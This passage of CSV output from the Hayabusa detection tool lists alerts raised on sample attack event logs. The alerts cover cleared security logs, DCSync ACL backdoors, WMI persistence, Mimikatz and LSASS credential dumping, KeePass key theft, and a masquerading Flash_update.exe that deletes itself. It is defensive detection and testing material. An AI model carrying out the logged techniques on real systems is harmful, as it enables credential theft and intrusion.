+09:00,PC01.example.corp,1102,high,Security log was cleared,User: user01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_1102_security_log_cleared.evtx +2019-03-25 18:09:14.916 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ACL_ForcePwd_SPNAdd_User_Computer_Accounts.evtx +2019-03-26 06:28:11.073 +09:00,DC1.insecurebank.local,1102,high,Security log was cleared,User: bob,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.022 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.023 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx 
+2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.024 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.025 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend 
Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-03-26 06:28:45.026 +09:00,DC1.insecurebank.local,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/DACL_DCSync_Right_Powerview_ Add-DomainObjectAcl.evtx +2019-04-04 03:11:54.098 +09:00,PC04.example.corp,1,informational,Process Creation,"Command: ""C:\Users\user01\Desktop\WMIGhost.exe"" : Path: C:\Users\user01\Desktop\WMIGhost.exe : User: PC04\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx 
+2019-04-04 03:11:54.178 +09:00,PC04.example.corp,20,high,Suspicious Scripting in a WMI Consumer,,rules/sigma/wmi_event/sysmon_wmi_susp_scripting.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:11:54.198 +09:00,PC04.example.corp,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,informational,Process Creation,Command: C:\Windows\system32\wbem\scrcons.exe -Embedding : Path: C:\Windows\System32\wbem\scrcons.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-04 03:12:00.016 +09:00,PC04.example.corp,1,high,WMI Persistence - Script Event Consumer,,rules/sigma/process_creation/win_wmi_persistence_script_event_consumer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/wmighost_sysmon_20_21_1.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\Sysmon.exe : Path: C:\Windows\Sysmon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:37.125 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\system32\wbem\unsecapp.exe -Embedding : Path: C:\Windows\System32\wbem\unsecapp.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:55:44.045 +09:00,IEWIN7,1,informational,Process Creation,"Command: sysmon -c 
sysmonconfig-18-apr-2019.xml : Path: C:\Users\IEUser\Desktop\Sysmon.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:08.370 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: Powershell : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop""",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:56:24.893 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:57:04.681 +09:00,IEWIN7,1,high,Process Creation Sysmon 
Rule Alert,"Rule: technique_id=T1088,technique_name=Bypass User Account Control : Command: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" : Path: C:\Windows\System32\mmc.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\system32\eventvwr.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 01:58:14.811 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:00:09.977 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1033,technique_name=System Owner/User Discovery : Command: ""C:\Windows\system32\whoami.exe"" /user : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: 
Powershell",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-19 02:01:35.720 +09:00,IEWIN7,10,high,Mimikatz Detection LSASS Access,,rules/sigma/deprecated/sysmon_mimikatz_detection_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/babyshark_mimikatz_powershell.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Users\IEUser\Downloads\Flash_update.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.368 +09:00,IEWIN7,1,medium,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.837 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" : Path: C:\Users\IEUser\AppData\Roaming\NvSmart.exe : User: IEWIN7\IEUser : 
Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.884 +09:00,IEWIN7,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: cmd.exe /A : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\AppData\Roaming\NvSmart.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:53.931 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 00:57:54.134 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""C:\Windows\System32\cmd.exe"" /c del /q ""C:\Users\IEUser\Downloads\Flash_update.exe"" : Path: C:\Windows\System32\cmd.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Users\IEUser\Downloads\Flash_update.exe"" 
",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/DE_timestomp_and_dll_sideloading_and_RunPersist.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1036,technique_name=Masquerading : Command: KeeFarce.exe : Path: C:\Users\Public\KeeFarce.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:47:00.046 +09:00,IEWIN7,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keefarce_keepass_credump.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.710 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Accessing WinAPI in PowerShell. 
Code Injection.,,rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 03:55:04.980 +09:00,IEWIN7,8,high,Suspicious Remote Thread Created,,rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_keepass_KeeThief_Get-KeePassDatabaseKey.evtx +2019-04-28 04:27:55.274 +09:00,IEWIN7,1102,high,Security log was cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_chrome_firefox_opera_4663.evtx +2019-04-28 06:04:25.733 +09:00,DESKTOP-JR78RLP,104,high,System log file was cleared,User: jwrig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-28 06:06:49.341 +09:00,DESKTOP-JR78RLP,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/disablestop-eventlog.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-29 01:29:42.988 +09:00,IEWIN7,10,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/process_suspend_sysmon_10_ga_800.evtx +2019-04-30 05:59:14.447 +09:00,IEWIN7,18,critical,Malicious Named 
Pipe,,rules/sigma/pipe_created/sysmon_mal_namedpipes.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: IEWIN7\IEUser : Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:21.539 +09:00,IEWIN7,1,low,Non Interactive PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\system32\whoami.exe"" /all : Path: C:\Windows\System32\whoami.exe : User: IEWIN7\IEUser : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:22.144 +09:00,IEWIN7,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 05:59:55.472 +09:00,IEWIN7,1,informational,Process Creation,Command: C:\Windows\System32\slui.exe -Embedding : Path: C:\Windows\System32\slui.exe : User: IEWIN7\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/lm_sysmon_18_remshell_over_namedpipe.evtx +2019-04-30 16:23:00.883 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.899 +09:00,IEWIN7,10,medium,Suspicious In-Memory Module 
